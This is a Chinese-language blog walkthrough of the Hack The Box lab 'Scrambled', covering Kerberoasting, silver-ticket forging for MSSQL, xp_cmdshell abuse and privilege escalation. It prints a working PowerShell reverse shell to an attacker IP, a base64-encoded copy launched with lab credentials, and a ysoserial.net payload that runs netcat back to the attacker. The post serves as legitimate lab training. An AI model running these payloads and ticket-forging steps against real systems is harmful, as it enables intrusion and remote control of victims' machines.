Hackthebox - Scrambled- linux

最新推荐文章于 2024-06-16 19:40:15 发布
最新推荐文章于 2024-06-16 19:40:15 发布
阅读量1.4k 收藏 38
点赞数 43
分类专栏: htb 文章标签: linux 网络 运维 工具开发 web安全 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136606145
版权

Recon

Port Scan

HTTP 80

根据在 support 页面得到的信息:

  • 邮箱 support@scramblecorp.com
  • 用户名 ksimpson
  • 一个用于连接 4411 端口的软件
  • 密码 ksimpson

SMB 445

这里连接 SMB 服务是连不上的,因为禁用了 NTLM

MSSQL 1443

SQL 服务也同样

Unknown service 4411

尝试连接 4411 端口,看样子需要指定的软件才能与 4411 端口通信

Kerberos enum

由于禁用了 NTLM 认证,所以后面的操作只能通过请求票据来认证。现在使用在 http://scrm.local/supportrequest.html 得到的用户名来尝试获取 TGT 票据

连接到 smb,在 Public 文件夹得到一个 PDF 文件

内容如下,这意味着接下来的攻击路径会和 smb 共享下的 HR 文件和 MSSQL 数据库有关

使用 GetUserSPNs 获取 sqlsvc 服务账户的 tgs

impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k

使用 hashcat 破解,得到凭据 sqlsvc:Pegasus60
使用凭据登录,出现报错

Silver ticker

由于禁用 NTLM,在得到凭据后需要制作 ST (Silver ticker)才能访问 MSSQL

要创建 ST,可以使用 ticketer 脚本

需要的参数有

  • NTHash
  • SID
  • FQDN (fully qualified domain name)
  • SPN (Service principal name)

下面将展示如何获取这些值
NTHash

 iconv -f <INPUT_ENCODING> -t <OUTPUT_ENCODING> <(printf "<PASSWORD>") | openssl dgst -md4

方法来自 Atucom: Generate NTLM hashes via command line
https://blog.atucom.net/2012/10/generate-ntlm-hashes-via-command-line.html
SID
使用 getPAC 来获取 SID 值

 impacket-getPac <DOMAIN>/<USERNAME>:<PASSWORD> -targetUser <TARGET_USER>

FQDN
域名为 scrm.local
SPN
在使用 getUserSPNs 时已得到 SPN,值为 MSSQLSvc/dc1.scrm.local

 impacket-ticketer -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local sqladmin

这条命令会输出一个 sqladmin.ccache 文件,需要使用 export KRB5CCNAME=sqladmin.ccache 设置环境变量才可以使用

MSSQL Enumeration

在 UserImport 表中得到一组新的凭据

xp_cmdshell

这里测试 xp_cmdshell 没有开启,需要使用 enable_xp_cmdshell 开启。

确认 xp_cmdshell 开启成功

Reverse shell

要获取 shell,首先要制作一个使用 base64 编码的 payload,然后在 MSSQL 交互处使用 xp_cmdshell 执行命令

┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ cat rev.ps1       
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.4', 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()                                                     
┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ str=`cat rev.ps1`                                                                                                         
┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ echo $str
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.4', 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
                                                
┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Scrambled]
└─$ echo -en $str | iconv -t UTF-16LE | base64 -w 0

由于得到的 sqlsvc shell 没有查看 user flag 权限,所以需要使用到之前在数据库里得到的凭据来获取 MiscSvc shell

$password = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential("scrm\miscsvc", $password)

Invoke-Command -ComputerName dc1 -ScriptBlock {powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4ANAAnACwAIAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAiAC4AIAB7ACAAJABkAGEAdABhACAAfQAgADIAPgAmADEAIgAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACAAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==} -Credential $creds


在 sqlsvc 尝试了各种土豆提权失败,看来还需要深一步挖掘
来到 C:\Shares\IT\Apps\Sales Order Client 目录,可以看到之前在 web 站点看到的 ScrambleClient.exe。他能够与 4411 端口交互

使用 miscsvc 凭据连接到 smb,将 IT 下的 exe 和 dll 文件下载到 kali。
这里可以看到,用 .net 编写

ROOT

从分析 .net 开始就看不懂了
writeup 使用的 https://github.com/pwntester/ysoserial.net 来生成了 .net 反序列化的 payload

.\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"

Ref

HackTheBox, Scrambled | Hacking Blog
https://myhomeisquintoc.com/challenge/scrambled

HTB: Scrambled [From Linux] | 0xdf hacks stuff
https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html#mssql-enumeration

Atucom: Generate NTLM hashes via command line
https://blog.atucom.net/2012/10/generate-ntlm-hashes-via-command-line.html

赛博雨天
关注
  • 43
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Scrambled-Sentences-for-Anki:语言学习
05-16
安基主题 Anki的混乱句子。 这个Anki主题将帮助您提高英语水平。 ,间隔重复软件是从初学者到经验丰富的英语语法学习工具。 ... 包括字段:音频,转录。 官方网站上的一些注释。...创建自己的卡片组是学习复杂主题的最有效...
Scrambled Word-crx插件
04-05
语言:English,español 你喜欢益智游戏吗? 扰乱的词在等你。 你喜欢拼图游戏吗? 扰乱的词在等你。
【Hack The Box】windows练习-- Scrambled
人间体佐菲的博客
11-18 472
【Hack The Box】windows练习-- Scrambled
HackTheBox - Medium - Windows - Scrambled
M1n9K1n9的博客
01-14 366
最近身体有些不舒服,恐怕理论值要与现实产生较大偏差了Scrambled 是一台中型 Windows Active Directory 计算机。通过枚举远程计算机上托管的网站,潜在攻击者能够推断出用户“ksimpson”的凭据。该网站还指出 NTLM 身份验证已禁用,这意味着将使用 Kerberos 身份验证。使用“ksimpson”的凭据访问“Public”共享时,PDF 文件指出攻击者检索了 SQL 数据库的凭据。这表明远程计算机上正在运行 SQL 服务。
HTB-Scrambled
2201_75378806的博客
06-01 603
Silver Ticket 是伪造的 TGS(票证授予服务)票证,直接在客户端和服务之间使用,无需经过 DC。我们的自助密码重置系统将很快启动并运行,但在此期间,请致电 IT 支持热线,我们将重置您的密码。如果没有人接听,请留言说明您的用户名,我们将重置您的密码,使其与用户名相同。该脚本旨在获取任何用户的权限属性证书,这只需要作为域中的用户进行身份验证。有大量有关该帐户的信息,但就我当前的目的而言,最后一项(在末尾看似随机的十六进制之前)是域 SID。我需要字符串形式的 SID,因此我将使用。
B - Scrambled Polygon POJ - 极角排序
BePosit的博客
10-26 178
B - Scrambled Polygon  POJ - 2007  按照与第一个点的夹角排序即可, #include&lt;cstdio&gt; #include&lt;cmath&gt; #include&lt;algorithm&gt; using namespace std; #define maxn 105 #define PR 1e-6 struct node { ...
POJ-2007-Scrambled Polygon
wjhshuai的博客
04-10 226
题目链接这道题就是极角排序判断叉积与0的大小关系#include&lt;iostream&gt; #include&lt;cstdio&gt; #include&lt;cstring&gt; #include&lt;cmath&gt; #include&lt;algorithm&gt; #include&lt;queue&gt; using namespace std; const int INF...
B - Scrambled Polygon
CSUST_ACM的专栏
05-09 705
B - Scrambled Polygon Time Limit:1000MS     Memory Limit:30000KB     64bit IO Format:%I64d & %I64u Submit Status Practice POJ 2007 Description A closed polygon is a figure bounded
POJ2007--Scrambled Polygon
Apple.Daily的专栏
08-16 573
题目大意:乱序给出凸多边形的顶点坐标,要求按逆时针顺序输出各顶点。给的第一个点一定是(0,0),没有其他点在坐标轴上,没有三点共线的情况。 分析:利用叉积排序。 代码: #include #include #include #include using namespace std; struct P { int x, y; P(){} P(i
【Kickstart】2018 Round A -Scrambled Words
lemonmillie的博客
06-16 363
解法 首先,通过(start,end,counter)来标识每个单词。 坑点有三: 搜索时不需要遍历单词数组,只需要从S中截取字符串,判断它是否在单词的哈希集合里 生成字符串的a,b,c,d还有x都得是长整型!!! 优化的点在于如何在长字符串里搜索,由于所有单词加在一起的长度不超过10510^5105,所以单词长度的种类数不超过102.510^{2.5}102.5,当长度固定时,在S上做滑动窗口...
POJ2007-Scrambled Polygon
ecjtu_acm_菜鸟—鱼尾尾
07-23 556
Scrambled Polygon Time Limit: 1000MS   Memory Limit: 30000K Total Submissions: 6667   Accepted: 3165 Description A closed polygon is a figure bounded by a finite number of
Scrambled Linear Pseudorandom Number Generators-计算机科学
04-22
Scrambled Linear Pseudorandom Number Generators∗DAVID BLACKMAN, Independent researcher, Australia SEBASTIANO VIGNA, Università degli Studi di Milano, ItalyLinear pseudorandom number generators are ...
Compressive imaging super-resolution based on scrambled block Hadamard ensemble
02-26
基于杂乱的块哈达玛集合的压缩成像超分辨率研究,孙镱诚,隋修宝,近些年在压缩感知邻域取得进展表面鲁棒地重建超分辨率图像是可能的。然而,简单有效的随机光学的感知结构设计仍然面临巨大挑战。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 272
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Ollama在MacOS、Linux本地部署千问大模型及实现WEB UI访问
派大夏的博客
06-14 885
阿里通义千问发布了Qwen2,提供了0.5B~72B的量级模型,在​​Ollama官网​​可以搜索qwen2查看,本文提供了Ollama的下载(在线/离线安装)、Ollama运行模型、使用WebUI连接模型以及页面简单配置。总体还是比较简单的,更高阶的玩法,看小伙伴的反馈,后面更新比如自定义智能体、训练等。
Linux基础命令
威桑的博客
06-11 1189
常见基础Linux命令
Linux,shell ,gun基本概念和关系
最新发布
ZMXdecode的博客
06-16 302
2、除了由内核控制硬件设备外,操作系统还需要工具来执行一些标准功能,比如控制文件(删除,复制,读取的权限,删除的权限)和程序(比如运行指定程序)。提供的是文件管理(这个文件管理不是我们的简单删除,复制什么的,具体可以查看操作系统的知识)、虚拟内存、设备I/O这些。3、Linux内核和GNU操作系统工具整合起来,就产生了一款完整的、功能丰富的免费操作系统所以通常将Linux内核和GNU工具的结合体称为Linux。,是一种特殊的交互式工具 ,用于提供用户与操作系统之间的交互接口。LiveCD测试发行版。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 773
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
def catmap(img, rounds): # 将图像转换为numpy数组 img_np = np.array(img) # 获取图像的宽度和高度 width, height = img.size # 设置Arnold置乱的参数 a = 3 b = 5 # 迭代进行Arnold置乱 for i in range(rounds): new_img = np.zeros_like(img_np) for x in range(width): for y in range(height): new_x = (a * x + b * y) % width new_y = (b * x + (a * b + 1) * y) % height new_img[new_x, new_y] = img_np[x, y] img_np = new_img return Image.fromarray(img_np) scrambled_image = catmap(image, 100) si = scrambled_image si = 255.0 * (si - si.min()) / (si.max() - si.min()) si = np.array(si, np.int) cv2.imwrite('scrambled_image.png', si) plt.imshow(scrambled_image, cmap='gray')、
06-13
这段代码中,catmap函数是将输入的图像进行Arnold置乱操作,并返回置乱后的图像。然后,通过调用catmap函数,将输入的image图像进行100次Arnold置乱,得到置乱后的图像scrambled_image。接下来,通过将每个像素点的值进行归一化和类型转换,将scrambled_image保存为png格式的图像文件。最后,使用imshow函数显示置乱后的图像。 这段代码中,有一些需要注意的地方。首先,在catmap函数中,return语句的位置应该在for循环的外面,否则每次迭代只会执行一次就直接返回结果了,无法达到指定的迭代次数。其次,在保存图像文件时,需要设置像素值的类型为整型,否则保存的图像会出现错误。最后,在显示图像时,使用imshow函数需要指定图像的颜色映射cmap为gray,否则会显示为彩色图像。 下面是修改后的代码: ```python def catmap(img, rounds): # 将图像转换为numpy数组 img_np = np.array(img) # 获取图像的宽度和高度 width, height = img.size # 设置Arnold置乱的参数 a = 3 b = 5 # 迭代进行Arnold置乱 for i in range(rounds): new_img = np.zeros_like(img_np) for x in range(width): for y in range(height): new_x = (a * x + b * y) % width new_y = (b * x + (a * b + 1) * y) % height new_img[new_x, new_y] = img_np[x, y] img_np = new_img return Image.fromarray(img_np) # 对图像进行100次Arnold置乱 scrambled_image = catmap(image, 100) # 将像素值归一化并转换为整型 si = 255.0 * (scrambled_image - scrambled_image.min()) / (scrambled_image.max() - scrambled_image.min()) si = np.array(si, np.int) # 保存置乱后的图像为png格式 cv2.imwrite('scrambled_image.png', si) # 显示置乱后的图像 plt.imshow(scrambled_image, cmap='gray') ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值